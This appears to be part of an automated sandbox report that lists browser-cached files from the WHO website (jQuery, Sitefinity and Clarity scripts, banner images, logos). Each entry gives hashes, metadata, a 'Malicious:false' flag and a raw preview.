                                                                                                                                                                    SSDEEP:1536:yTExXUZinxD7oPEZxkMV4SYKFMbRHZ6H5HOHCWrcElzuu7BRCKKBEqBsojZlOPma:ygZm0H5HO5+gCKWZyPmHQ47GKe
                                                                                                                                                                    MD5:220AFD743D9E9643852E31A135A9F3AE
                                                                                                                                                                    SHA1:88523924351BAC0B5D560FE0C5781E2556E7693D
                                                                                                                                                                    SHA-256:0925E8AD7BD971391A8B1E98BE8E87A6971919EB5B60C196485941C3C1DF089A
                                                                                                                                                                    SHA-512:6E722FCE1E8553BE592B1A741972C7F5B7B0CDAFCE230E9D2D587D20283482881C96660682E4095A5F14DF45A96EC193A9B222030C53B1B7BBE8312B2EAE440D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ScriptResource.axd?d=wIuRaUoAZ6lXIF1Yn5fO2EpVfHcRi4irbKbgceV3EeMTgdEj-Ek9QoQbG7mp45iS4XdHurGk8hBAXXDnoR0RqHzZa24YVwVTlIu5rG60plrL-8Eufi9i0CFBYdqNSSyQsLamqkpHqRo9WOM3m8LuU9HR5Kkk3eZlZFrAS4vVgmRuq0330&t=ffffffffcd3c2666
                                                                                                                                                                    Preview: /*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\ScriptResource[2].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):8270
                                                                                                                                                                    Entropy (8bit):5.006208841630281
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:zDdwADmtum6rPl2K/kNEZf+NEVZfau6xnhjOLh5xP5tQPqXIz:zDdwAAurrd4EZfJ9au62Lh5xPEqXIz
                                                                                                                                                                    MD5:4FB244EB938FA6AFA087385107EE5133
                                                                                                                                                                    SHA1:F754E124FF0B72332DCB26A0A6AC46C76D1DDD6E
                                                                                                                                                                    SHA-256:CDA66AAAC66C47585D9917FCF9E6C0F28322715CAF35B94E0F8224AB629182C4
                                                                                                                                                                    SHA-512:61E609DF6806A2CD53BC69B0E325D9C83E45B5B1E9E22BBA6493834249453B531853DB3C95F76C895901D3736A7EC3D3871D427C99AC0DFD5C15F88643C89CF6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ScriptResource.axd?d=EydukmxBmDstn7gSYzQESE1bnHjeXRVx7U6aQHJyFA9m0Lf0S2mLTHIjDE43-hll5grqfOTCvX6EmOM9LNFV337jy4D-8ywkRJfvfs9rwa9DHQKxleN2Wm83nE30kTqWc6-SapTPLY8qz6Xa4mLUpUO4eNtgV_s22zOlIqeJlVeUWOY70&t=ffffffffcd3c2666
                                                                                                                                                                    Preview: /*! jQuery Migrate v1.2.1 | (c) 2005, 2013 jQuery Foundation, Inc. and other contributors | jquery.org/license */.jQuery.migrateMute === void 0 && (jQuery.migrateMute = !0), function (e, t, n) { function r(n) { var r = t.console; i[n] || (i[n] = !0, e.migrateWarnings.push(n), r && r.warn && !e.migrateMute && (r.warn("JQMIGRATE: " + n), e.migrateTrace && r.trace && r.trace())) } function a(t, a, i, o) { if (Object.defineProperty) try { return Object.defineProperty(t, a, { configurable: !0, enumerable: !0, get: function () { return r(o), i }, set: function (e) { r(o), i = e } }), n } catch (s) { } e._definePropertyBroken = !0, t[a] = i } var i = {}; e.migrateWarnings = [], !e.migrateMute && t.console && t.console.log && t.console.log("JQMIGRATE: Logging is active"), e.migrateTrace === n && (e.migrateTrace = !0), e.migrateReset = function () { i = {}, e.migrateWarnings.length = 0 }, "BackCompat" === document.compatMode && r("jQuery is not compatible with Quirks Mode"); var o = e("<input/>
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Search-box.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):5356
                                                                                                                                                                    Entropy (8bit):5.199515941231924
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:lsa2aKTE9Ad0ZUmA9sW8dHgpUkzrnNQu+gzs+fIRHi33cjgBC72:PTebsgUk/rARHi33EgY72
                                                                                                                                                                    MD5:232F94258D92EA1885690A91531F5401
                                                                                                                                                                    SHA1:FABFD4FED1C99BBB3E3AD4D5EB7E6EA0D7254B23
                                                                                                                                                                    SHA-256:B496C436E9861815009B3211A92DA3E6038D79BA690C6184DD01B2810F5CFE09
                                                                                                                                                                    SHA-512:5AAE900E39A7FDB4625EE00B29AAB1A0CE014A11118C1A7D023E4BD1E931A99FDEDFCB0D0C808C33FF406C3D19C7973FE9AE9D43227CE1AB0C2BF3FE7C89D600
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/Frontend-Assembly/Telerik.Sitefinity.Frontend.Search/Mvc/Scripts/SearchBox/Search-box.min.js?package=WHO&v=LTExNTI1MzQxODA%3d
                                                                                                                                                                    Preview: "use strict";function GetQueryStringParameteres(){for(var queryParams=[],params=window.location.href.slice(window.location.href.indexOf("?")+1).split("&"),i=0;i<params.length;i++){var name=params[i].split("=")[0],value=params[i].split("=")[1];queryParams[name]=value}return queryParams}function GetPreselectedValues(data,loaded){if(!loaded)return null;for(var preselectedValues=[],i=0;i<loaded.length;i++)for(var j=0;j<data.length;j++)data[j].Value==loaded[i]&&preselectedValues.push(data[j]);return preselectedValues}!function($){$(document).ready(function(){$("#current-culture").val();for(var searchInput=$('input[type="search"]'),searchClearIcon=searchInput.closest(".input-wrapper").find(".k-icon"),searchBoxIdFields=$('[data-sf-role="searchTextBoxId"]'),i=0;i<searchBoxIdFields.length;i++){var searchBoxIdField=$(searchBoxIdFields[i]);featherSearchBoxWidget({resultsUrl:searchBoxIdField.siblings('[data-sf-role="resultsUrl"]').first().val(),indexCatalogue:searchBoxIdField.siblings('[data-sf-ro
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\WebResource[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):3855
                                                                                                                                                                    Entropy (8bit):5.1064694730487385
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:xvTmCcxNDbT2g03nDfmTHqsk04CoDAL1iQBq/cS5gsT+iM0TEM4SSF48:BKHmMNk04CorzSLF48
                                                                                                                                                                    MD5:20BC91824BE4AE00DDDA6A70181D05E6
                                                                                                                                                                    SHA1:DDF3FC6BBACB9D40822F3FCDE0558F51E74D43EE
                                                                                                                                                                    SHA-256:730D716E47B4A720B56FB7A31DDD58AEEA3AFE791703970C60F80CDA610E0CE5
                                                                                                                                                                    SHA-512:1A4B5E6B3F2EC014BE85A9FF0FF2CB9C671679B2E6CD0DA8C65C438F36CB67F73B5E497AA31CC3C95A04DB05066CCCB85720B6C4EB71367975C177F8E201DB84
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/WebResource.axd?d=NjxTqR2bqTw1rewxxlkHPuVWylniiuH85dElS4-sTWByH4RE8E5E1AceaaoCFAJqZaJ0XO7-0paGWvgZTYHK6HfSMq7_7jIhS9QthTeHBDUU0pberHuOZvwLatBEXp3F8dWshLi8dFLqd-R5ePILXLxt9fP0bczWzQjlYINayIOpB5YnfTHc2ZyRpWOgtz7dNZw0Q5MPTr0UAPNLDUP5XStYynM1&t=637432980600000000
                                                                                                                                                                    Preview: .var PersonalizationTracker = null; !function () { "use strict"; PersonalizationTracker = { _canTrack: !1, _pageId: null, _url: !1, track: function (e) { if (PersonalizationTracker._canTrack = e, PersonalizationTracker._canTrack) { if (!PersonalizationTracker._readCookie("sf-prs-ss")) { var r = 1e4 * Date.now() + 621355968e9; PersonalizationTracker._createCookie("sf-prs-ss", r) } if (!PersonalizationTracker._readCookie("sf-prs-lu")) { var a = window.top || window; PersonalizationTracker._createCookie("sf-prs-lu", a.location.href) } PersonalizationTracker._pageId && PersonalizationTracker.trackPage(PersonalizationTracker._pageId), PersonalizationTracker._url && PersonalizationTracker.trackUrl() } else PersonalizationTracker._createCookie("sf-prs-ss", "", -1), PersonalizationTracker._createCookie("sf-prs-lu", "", -1), PersonalizationTracker._createCookie("sf-prs-vp", "", -1), PersonalizationTracker._createCookie("sf-prs-vu", "", -1) }, trackPage: function (e) { if (this._pageId = e.rep
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\YHCW2021_webbanner[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x476, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):104380
                                                                                                                                                                    Entropy (8bit):7.990167341345852
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:3072:TUa/BO+3IjWLORKYasxskndKOfq4TDW5eu/2K:TUYyjWLUdasxLHBCl
                                                                                                                                                                    MD5:B2C98CC3814C8816951F05A0A649040B
                                                                                                                                                                    SHA1:E4FE75EA77CEBBA9B54607EBE8E0F6C0633D0DE4
                                                                                                                                                                    SHA-256:DEED548FD3A02C88610065C39F1E40702D708E45D95016965CD6CB4D8F26EF5A
                                                                                                                                                                    SHA-512:E7BBAF218D322A7C31D423D1192C46B209258E1964176C51FA7F7009B005C5711FA37535D4D9D530F9FEE0EB65BF1CAB1A1D55539DB6D9CA74854F09C70AD96E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/campaigns/annual-theme/year-of-health-and-care-workers-2021/yhcw2021_webbanner.tmb-1024v.jpg?Culture=en&sfvrsn=8bc1f524_3
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C............................................................................"................................................................................Y..I...=Y.z......b..'.8..T?...o....+.OF...Pr.....sTO.*...s....^N..W..y8...y8...y8...y8...y8...y8...y8...y8...y8.......x.Wo.^E.rp/w.y...P......%.P^N.r*9QC..]....TP.N.../w..p`..S.7.p.Q.....xv.......\.c.!...aZ....(Wm._.]....^F3.|...pcWb...# .....82N.YX.....?b.....f;O..v..3.n..i.3]......;.$..h..*:!....foW...J...G....w[G)V...Uu.C.n[RU.....rvQu..R./..[.!!V.$..A..^.5.Z.;U.IQ8l..#5..l....e...cU..UT7......:>.z...~.0EL=..NE...k.(.>[...l..s.,BKc(S..!.....S{Uk...v>.y...p7...w!..cy.#...p3....<.g;...n.._....;.=m.G......__ pz.....]..Y.)xz..monr@...MeM...0.qC.m.G....r22*.$...#.o....Z.....%...2j:...6.6|...s.&.B..f...'Gl={#.F..-...9{..G..f....w...^..Po/.#... 7...w.Q..M!w..?hHb..N,A.Y.7aq ...UR.....9...@.(B..t\...o;........k]
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\YHCW2021_webbanner[2].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 768x357, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):65824
                                                                                                                                                                    Entropy (8bit):7.989331715764146
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:jBdNSVJzAcAY1SPuyhw6FjIjd5lgNiCrKXpTirkkQuqjFZF:D4j8cAY1+tVIyN78li4Yqp
                                                                                                                                                                    MD5:FFE8B53F29C1EBCB3021D543302C4079
                                                                                                                                                                    SHA1:1A1D0EE69F9CBEF97B9038FD4CA9DFE7496051C1
                                                                                                                                                                    SHA-256:1CB5DF96B71EE2980ED3CA57502532DF7745E0845B7196560233B06F9BBFAB75
                                                                                                                                                                    SHA-512:D14CB0D611565F7815D8998328BBD6DFE83330DC0151EFA419DA9CD4518EECE6A960BA590FE31FD91116ED635E2DAA2038432F7417390DB339BDB71A21FF4134
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/campaigns/annual-theme/year-of-health-and-care-workers-2021/yhcw2021_webbanner.tmb-768v.jpg?Culture=en&sfvrsn=8bc1f524_3
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C.......................................................................e...."......................................................................................V(?...7..b...'....T9X..b...'.U.V(9[..5P....w..k...^N...^N...^N...^N...^N...^N...^N.....W.z...Uj.U8.QD.....UE..Q/".U8J......UE.*(/w..8sy>....NT.4H.A._p...;?a.L.....CNm..f..x.F@x. .....8....i.5-(.h..e.u4.......An.#/.G".B.z#.!..*..U.o5...J...]..*{;)#..E....;.0.di..o..t5.5^2......E.j.vzl..2.]8.x.Z.*?....[.......F3..o*.wr<.....K..,d....~.X.5.k......'..Ti..k..z.3..9..... ..d.zBL.d=....:.[Yl.vV[25K.O$..O..qJ0.u...XyKh.MN..5."..(.........c.d@..UX].7uvYe..k..\...e..=d...a.Q.e.,.b...r;..e..7r./'r..>...NsgO"#NGtmb=...@.N.X^..*"<Fny..~\..aE-Bf.......4.N}..OV....6.cnG..(..,e.&h.I..{..`c..|...2h.F:j)...ZN.Q....Z..O[.....J.W.6.6.'4z.ToBv...=$.Y.K.....5.e.e._.......y:S.mV-...k1k70.}..YX.^..g.?"E..)jo^m..Hng_.F.tm.L.).vQ6....
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clarity[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):46048
                                                                                                                                                                    Entropy (8bit):5.343769565964777
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:+lBiQfBiWFkKoB8LBdGAZzUHWIk3k8ccsyrT/W/l/Y:IeGkBWZlk8nv0A
                                                                                                                                                                    MD5:10EDE00503539D541E794D2392F1ACE3
                                                                                                                                                                    SHA1:BFBD044B3E3B351B0521FDE30BEC8F655649B681
                                                                                                                                                                    SHA-256:601ECEF6383D02E04903FDF3DD7CFDD968FB09973E39F74B583EB7B9773E8F0E
                                                                                                                                                                    SHA-512:CF17F75CC7467D6CB81269956AB0A731330DCC7E4FA929D08C55D12E234671195DBDC7A4B2F5C52D5D4063E099D25EBB39D5C3B837B80387AFF3F4B69E0DB2E6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.clarity.ms/eus2/s/0.6.10/clarity.js
                                                                                                                                                                    Preview: /* clarity-js v0.6.10: https://github.com/microsoft/clarity (License: MIT) */.!function(){"use strict";var t=Object.freeze({__proto__:null,get track(){return An},get start(){return Pn},get queue(){return Un},get stop(){return Bn}}),e={projectId:null,delay:3e3,cssRules:!1,lean:!0,track:!0,content:!0,mask:[],unmask:[],regions:{},metrics:{},cookies:[],report:null,upload:null,upgrade:null};function n(t,e,n,a){return new(n||(n=Promise))((function(r,i){function o(t){try{s(a.next(t))}catch(t){i(t)}}function u(t){try{s(a.throw(t))}catch(t){i(t)}}function s(t){var e;t.done?r(t.value):(e=t.value,e instanceof n?e:new n((function(t){t(e)}))).then(o,u)}s((a=a.apply(t,e||[])).next())}))}function a(t,e){var n,a,r,i,o={label:0,sent:function(){if(1&r[0])throw r[1];return r[1]},trys:[],ops:[]};return i={next:u(0),throw:u(1),return:u(2)},"function"==typeof Symbol&&(i[Symbol.iterator]=function(){return this}),i;function u(i){return function(u){return function(i){if(n)throw new TypeError("Generator is alre
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\content-block.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):2258
                                                                                                                                                                    Entropy (8bit):4.815861912657056
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:x/BXA7n6y+zA+hsG1siIMRKMoNi15yqeTe6fNTyn8c:x66ysAwLHWeio8c
                                                                                                                                                                    MD5:E5B84AF688065EDE4F4B9D30C05BBE0C
                                                                                                                                                                    SHA1:E1C49051394CB36A5C5A81A960CECE54460FC4C8
                                                                                                                                                                    SHA-256:2E72A2EF97403F4E076E88CA1581CA566886FBEC347A44980B55CBD8298B8A0C
                                                                                                                                                                    SHA-512:D053867A290C40A4BB1C00C7F1E569EB96FA1C8E56CB4C68A4E4DA89CA3760686B70A927A9F4DC82C2C097ABD6F8AB5DAD66BDA66CCE16141247DD3330E0F676
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/Mvc/Scripts/ContentBlock/content-block.min.js?package=WHO
                                                                                                                                                                    Preview: "use strict";!function(){for(var referenceNode,wrapper,imgContentBlockWrapper=document.querySelectorAll(".sf-content-block img"),i=0;i<imgContentBlockWrapper.length;i++){var img=imgContentBlockWrapper[i],imgWrapper=document.createElement("div");if(imgWrapper.setAttribute("class","img-wrapper"),null!==img.getAttribute("data-sf-show-caption")){var caption=img.getAttribute("data-sf-caption"),credit=img.getAttribute("data-sf-credit"),captionNew=img.getAttribute("data-sf-caption-text"),creditNew=img.getAttribute("data-sf-credit-text");if(null!==captionNew&&(caption=captionNew),null!==creditNew&&(credit=creditNew),null!==caption||null!==credit){var captionWrapper=document.createElement("div");captionWrapper.setAttribute("class","sf-image-credit"),imgWrapper.appendChild(captionWrapper);var captionWrapperContent=document.createElement("div");captionWrapperContent.setAttribute("class","sf-image-credit__content"),captionWrapper.appendChild(captionWrapperContent);var captionWrapperInner=document.
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\event[1].png
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:PNG image data, 565 x 569, 8-bit/color RGB, non-interlaced
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):28900
                                                                                                                                                                    Entropy (8bit):7.8938708465480865
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:kNWicJeg+mnMfOlU7kuVawtxj2TAxKjDVFVMNdZg7a/bvkNwyJ4OLF16nswS2Sj4:cLcJeg+mMkgPjLKXnVMxgGbzr8WsUSk
                                                                                                                                                                    MD5:775DA22DEA03718AB38ECC378CB404B4
                                                                                                                                                                    SHA1:A1D495A26EAB71E84B3A74D310030E66BD815F31
                                                                                                                                                                    SHA-256:41DAF6E2DBFB1C0E5D8CC334628374ED2E3F1DBDFC8DB4A600135CD613A3460D
                                                                                                                                                                    SHA-512:3711FBEA2D3690C07CB38ABAE82F0BDCBB5ECFA58E9BE289B19CA7025D2FA9093280716D68BF705BE3812AC77C7F2AA260BBC773740BB7C28636E14CF80DB5D6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/fallback/icons/media-centre/event.tmb-768v.png?Culture=en&sfvrsn=c073cbae_12
                                                                                                                                                                    Preview: .PNG........IHDR...5...9......\.....sRGB.........gAMA......a...p.IDATx..Kp.W..h....q.|...r..6M.v..s+f?QU..0i..o.52....]..c.F....\.h.*.cZdE["......". .~Q".''..s2A...1...}qJE....<.....Z.......k.............'...........'...........'.....?.....'.....?.....'.....?.....'.....?...........?...........?...........?............O...........O...........O...........O.....~.....O.....~.....O.....~.....O.....~...........~...........~...........~.................................................................................................'...........'...........'...........'.....?.....'.....?.....'.....?...........?...........?..".B1._'..mA......i..B.9r.D(R.f.CK>2...>-a8..#BuNB..@....,C..AA^!.QB..5B..h...{.V.........?%p..1..*B..Z..;][#..........R./.k..E.j.6?...$r..[.Os,.?.a:.[.I(.4.s....[cy._._..].0.?....n.,m...$.f..].n<l......[..\.9....M.si{v1..I'?E. Bz.K;I....._n.......n<...'.d.4..P......g..../.L....d.|.K..&..>..W.b. .C.i..H....pj..w...../.u..[]..X.VL%O.f.....[..j..u..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\event[2].png
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:PNG image data, 479 x 482, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):29228
                                                                                                                                                                    Entropy (8bit):7.911774994779232
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:zKvVpzhCM+T971aHyCdDGUAqy4toXjt/mOml1bS+3l:+v/hS1KdyUZRtIt/mvB3l
                                                                                                                                                                    MD5:61296AE34FEB1D1C9078D26DBBA716A9
                                                                                                                                                                    SHA1:75BE11485706D79F3615D61C3D2DF6C01C5DED6A
                                                                                                                                                                    SHA-256:BED887C2AFA59358CCF4E2669EE3A334278FDA24BE1EBA759C5B8C291E50A146
                                                                                                                                                                    SHA-512:AF9EF4D849C56EA2841CE10FA4B31418B82E4F55DF59C7D559D67AC1ADA35DEAE5CA87E3722B969CAF1C73EE76A4B5E7BA6100CAD9E477D712CACEEB9DC15F86
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/fallback/icons/media-centre/event.tmb-479v.png?Culture=en&sfvrsn=c073cbae_12
                                                                                                                                                                    Preview: .PNG........IHDR................+....sRGB.........gAMA......a...q.IDATx...].-.a......g..c;5N.4i..G.i...B...!......*...h.@.^ !.K...R%..Bn..zC......).qR.i..=...9.{}/Zg.xf<..........d....>eY.eY.Cxu..1^.,.,.S7.|n..eY.eY...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...,.,.A..,...p.U[.^i.U....D[.(U.(ui..)U.D-.3.L.PZ.u.umU......LE..n..'...c.#..(..<..q..;5D....+.{a..p.Fib...o.u{2.N!(.'nl|......W)...7n.0S)..P5......7hD\.u.^.5.9e.VE.F...6^.n..V3...u...II..._....k.F.....G....g?..>yc..............k7OmFT1.%.....o.....q............-7.pPa.y:.....~.O..6q.@.?~.m...yY..FE....M........;E.../...m...z..o.lF..TU.
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\h-logo-blue[1].svg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):16220
                                                                                                                                                                    Entropy (8bit):4.2109186285257
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:i+y2TeDhgrpsd626Z76qvZq+4omAdY+nQc1y7bhfe2bUTCpKaFYbbPENQWL+XGda:4tSpsQ6qvH4odxQGy7bE6UTCkbzOQPXH
                                                                                                                                                                    MD5:25B83F51B93045685C1B1878D980004D
                                                                                                                                                                    SHA1:ACAF6AB0A5C1B89AB18370AA0D73EF9DF99EF00A
                                                                                                                                                                    SHA-256:907E8040278F2B7ADBCF0C5CB0158E768526C2FE3E0F21FD15F19EF5A3E7CA51
                                                                                                                                                                    SHA-512:8E71073F380DEDC06854B64B1390BD83ABACC6D85FADF4041A165156F0BA5EF625B2D6D944485474648F7041F75A2C0F45E725F20AF87558FF07C42E6250F5FE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/fallback/header-logos/h-logo-blue.svg?sfvrsn=aaed4f35_18
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-16"?>..<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 580.82 177.96">.. <defs>.. <style>.cls-1{fill:#0093d5;}</style>.. </defs>.. <title>World Health Organization</title>.. <g id="Layer_2">.. <g id="ENGLISH">.. <path class="cls-1" d="M164,32.58c3.86,4.6,10.61,7.31,14.56,11.92-2.83-13.63-13.35-24.76-25.79-27.42C158.84,21.65,160.15,28,164,32.58ZM14.48,67.13c8.57-18.65,21.36-14.7,26.77-32.47-3,5.45-17,7.75-23.51,21.72,3.31-8.3,1.65-21,7.25-27.85C8.25,40.88,15.38,60.86,14.48,67.13ZM30,111.86c1.54,7.26-3,17.74,4.2,27.76C26.76,131.28,11,129.16,4.58,116.48c8,31,29,24.6,38.39,31.33C35.21,136.66,41.56,129.25,30,111.86Zm-2.41,19.45C23,114,31.18,108,24.93,91.4c-.65,9.36-6.89,13.92-2.68,31C14.82,107.94,3.33,102.54,0,92.6.23,119.78,22.07,123.81,27.59,131.31Zm33.54,29c-6.43-8.9-2-13.93-20.1-30.09,3.82,5.9-.12,13.32,12.06,24.86-11.92-7-28.36-4-36.29-13.41C30.42,167.74,54.35,157.1,61.13,160.34Zm87.42-5.23c12.18-11.54,8.24-19,12.06-24.86-18.06,16.1
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\h-logo-white[1].svg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):15877
                                                                                                                                                                    Entropy (8bit):4.141166902508873
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:ttSpsQ6qvH4odxQGy7bE6UYCRhmYSboCf:izUbE6UY+EdUCf
                                                                                                                                                                    MD5:B22EA072DB23528D4D9E1394174839D1
                                                                                                                                                                    SHA1:BD017907D6EB3B8EFFA32F209483A29C2E243C45
                                                                                                                                                                    SHA-256:73E703721930186D3E47F7B259F032830D1C1ABF0AFF5555EB14E95B9F761E8E
                                                                                                                                                                    SHA-512:B04A71B8D6DAB9582A52C10F2DF8EB6E296446A7D31D948B2F0D2CD1D64B848B7507987E0C9EDD3265513EEDEB676ED95810545FEE8C3BF5E2C211EC3CAF2DEC
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/images/logos/en/h-logo-white.svg
                                                                                                                                                                    Preview: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 580.82 177.96"><defs><style>.cls-1{fill:#fff;}</style></defs><title>World Health Organization</title><g id="Layer_2" data-name="Layer 2"><g id="ENGLISH"><path class="cls-1" d="M164,32.58c3.86,4.6,10.61,7.31,14.56,11.92-2.83-13.63-13.35-24.76-25.79-27.42C158.84,21.65,160.15,28,164,32.58ZM14.48,67.13c8.57-18.65,21.36-14.7,26.77-32.47-3,5.45-17,7.75-23.51,21.72,3.31-8.3,1.65-21,7.25-27.85C8.25,40.88,15.38,60.86,14.48,67.13ZM30,111.86c1.54,7.26-3,17.74,4.2,27.76C26.76,131.28,11,129.16,4.58,116.48c8,31,29,24.6,38.39,31.33C35.21,136.66,41.56,129.25,30,111.86Zm-2.41,19.45C23,114,31.18,108,24.93,91.4c-.65,9.36-6.89,13.92-2.68,31C14.82,107.94,3.33,102.54,0,92.6.23,119.78,22.07,123.81,27.59,131.31Zm33.54,29c-6.43-8.9-2-13.93-20.1-30.09,3.82,5.9-.12,13.32,12.06,24.86-11.92-7-28.36-4-36.29-13.41C30.42,167.74,54.35,157.1,61.13,160.34Zm87.42-5.23c12.18-11.54,8.24-19,12.06-24.86-18.06,16.16-13.67,21.19-20.1,30.09,6.78-3.24,30.71,7.4,44.32-18.64C176
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\image-resolution.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):1923
